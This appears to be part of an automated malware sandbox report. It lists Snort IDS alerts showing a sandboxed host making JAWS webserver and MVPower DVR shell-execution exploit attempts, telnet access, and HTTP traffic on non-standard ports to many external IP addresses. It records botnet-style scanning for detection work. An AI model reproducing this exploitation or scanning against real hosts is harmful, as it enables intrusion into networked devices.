Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47884 -> 212.162.153.57:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44738 -> 23.65.25.211:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46632 -> 103.53.72.59:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47884 -> 212.162.153.57:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44738 -> 23.65.25.211:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.65.25.211:80 -> 192.168.2.23:44738
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46632 -> 103.53.72.59:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47448
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33360 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33360 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.136.124:80 -> 192.168.2.23:33360
Source: Traffic	Snort IDS: 716 INFO TELNET access 195.162.70.50:23 -> 192.168.2.23:50284
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49150 -> 63.35.106.33:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55334 -> 159.69.185.199:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56866 -> 46.41.57.63:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49150 -> 63.35.106.33:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55334 -> 159.69.185.199:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56866 -> 46.41.57.63:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33030 -> 45.79.11.93:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35318 -> 107.174.250.137:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49626 -> 23.222.205.199:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57894 -> 23.211.83.100:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58204 -> 54.91.171.119:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33030 -> 45.79.11.93:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35318 -> 107.174.250.137:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49626 -> 23.222.205.199:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.222.205.199:80 -> 192.168.2.23:49626
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52570 -> 104.71.231.31:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57894 -> 23.211.83.100:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.211.83.100:80 -> 192.168.2.23:57894
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58204 -> 54.91.171.119:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54488 -> 147.47.78.53:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54360 -> 184.84.124.175:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52570 -> 104.71.231.31:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.71.231.31:80 -> 192.168.2.23:52570
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51624 -> 17.250.122.106:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52902 -> 59.124.138.19:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38762 -> 175.183.94.16:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54488 -> 147.47.78.53:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54360 -> 184.84.124.175:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.84.124.175:80 -> 192.168.2.23:54360
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52902 -> 59.124.138.19:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51624 -> 17.250.122.106:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38762 -> 175.183.94.16:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47506
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57218 -> 31.19.184.171:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60228 -> 103.195.102.61:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56110 -> 104.64.130.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47650 -> 163.198.43.32:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47052 -> 184.168.137.54:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58648 -> 87.229.82.196:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47650 -> 163.198.43.32:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 163.198.43.32:80 -> 192.168.2.23:47650
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58648 -> 87.229.82.196:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34342 -> 134.121.170.228:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47008 -> 43.255.108.94:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34152 -> 192.99.143.98:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60228 -> 103.195.102.61:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60098 -> 13.55.91.197:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56110 -> 104.64.130.77:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.64.130.77:80 -> 192.168.2.23:56110
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47052 -> 184.168.137.54:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34152 -> 192.99.143.98:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44014 -> 104.109.117.106:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47008 -> 43.255.108.94:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37630 -> 156.240.39.3:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60098 -> 13.55.91.197:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57218 -> 31.19.184.171:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44014 -> 104.109.117.106:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.109.117.106:80 -> 192.168.2.23:44014
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37630 -> 156.240.39.3:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47692
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44106 -> 139.162.229.143:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47352 -> 31.208.99.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37748 -> 104.18.66.142:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44106 -> 139.162.229.143:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37748 -> 104.18.66.142:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47352 -> 31.208.99.77:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47818
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56204 -> 195.225.34.29:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57852 -> 188.111.50.247:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56204 -> 195.225.34.29:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58694 -> 94.140.229.82:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57852 -> 188.111.50.247:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53436 -> 65.36.226.43:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34118 -> 76.200.91.184:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58694 -> 94.140.229.82:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56224 -> 192.119.107.248:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33204 -> 40.118.173.33:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53436 -> 65.36.226.43:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60454 -> 23.13.120.245:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58256 -> 206.189.155.223:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34118 -> 76.200.91.184:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35794 -> 156.67.65.106:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56224 -> 192.119.107.248:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33204 -> 40.118.173.33:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37096 -> 136.0.151.186:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60454 -> 23.13.120.245:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.13.120.245:80 -> 192.168.2.23:60454
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35794 -> 156.67.65.106:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38050 -> 139.99.197.232:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58256 -> 206.189.155.223:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37096 -> 136.0.151.186:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38050 -> 139.99.197.232:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33784 -> 51.255.48.130:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33784 -> 51.255.48.130:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47900
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48614 -> 195.224.198.148:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53482 -> 23.47.32.31:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48614 -> 195.224.198.148:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56958 -> 34.249.35.248:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53482 -> 23.47.32.31:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.47.32.31:80 -> 192.168.2.23:53482
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56958 -> 34.249.35.248:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38452 -> 54.255.225.69:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43500 -> 156.213.72.167:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34422 -> 102.22.248.62:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43500 -> 156.213.72.167:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54278 -> 54.254.184.145:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38452 -> 54.255.225.69:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34422 -> 102.22.248.62:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54278 -> 54.254.184.145:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34722 -> 13.230.241.127:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60100 -> 59.126.58.157:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34722 -> 13.230.241.127:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60100 -> 59.126.58.157:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56936 -> 118.214.30.19:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41974 -> 209.212.38.169:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44040 -> 35.177.236.245:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45564 -> 44.225.184.188:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40660 -> 23.5.198.5:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56936 -> 118.214.30.19:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 118.214.30.19:80 -> 192.168.2.23:56936
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44040 -> 35.177.236.245:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56000 -> 104.65.62.161:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58712 -> 67.192.246.234:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41974 -> 209.212.38.169:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56860 -> 23.210.205.99:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55890 -> 45.38.40.243:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56000 -> 104.65.62.161:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.65.62.161:80 -> 192.168.2.23:56000
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45564 -> 44.225.184.188:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40660 -> 23.5.198.5:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.5.198.5:80 -> 192.168.2.23:40660
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58712 -> 67.192.246.234:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56860 -> 23.210.205.99:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.210.205.99:80 -> 192.168.2.23:56860
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34924 -> 167.57.119.142:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55890 -> 45.38.40.243:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34924 -> 167.57.119.142:80

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35056
Source: unknown	Network traffic detected: HTTP traffic on port 42128 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35062
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35070
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35078
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35082
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35108
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35146
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35164
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35220
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35230
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35234
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35240
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35248
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35254
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35306
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35316
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35324
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35330
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35338
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35354
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35378
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35382
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35388
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35404
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35410
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35422
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35456
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35466
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35500
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35506
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45540
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45552
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45556
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45562
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45570
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45592
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45596
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45604
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45618
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45646
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45650
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45656
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45700
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45714
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45722
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45734
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45746
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45750
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45756
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45760
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45768
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45770
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45782
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45800
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45814
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45822
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45830
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45844
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45870
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45884
Source: unknown	Network traffic detected: HTTP traffic on port 34666 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 34666
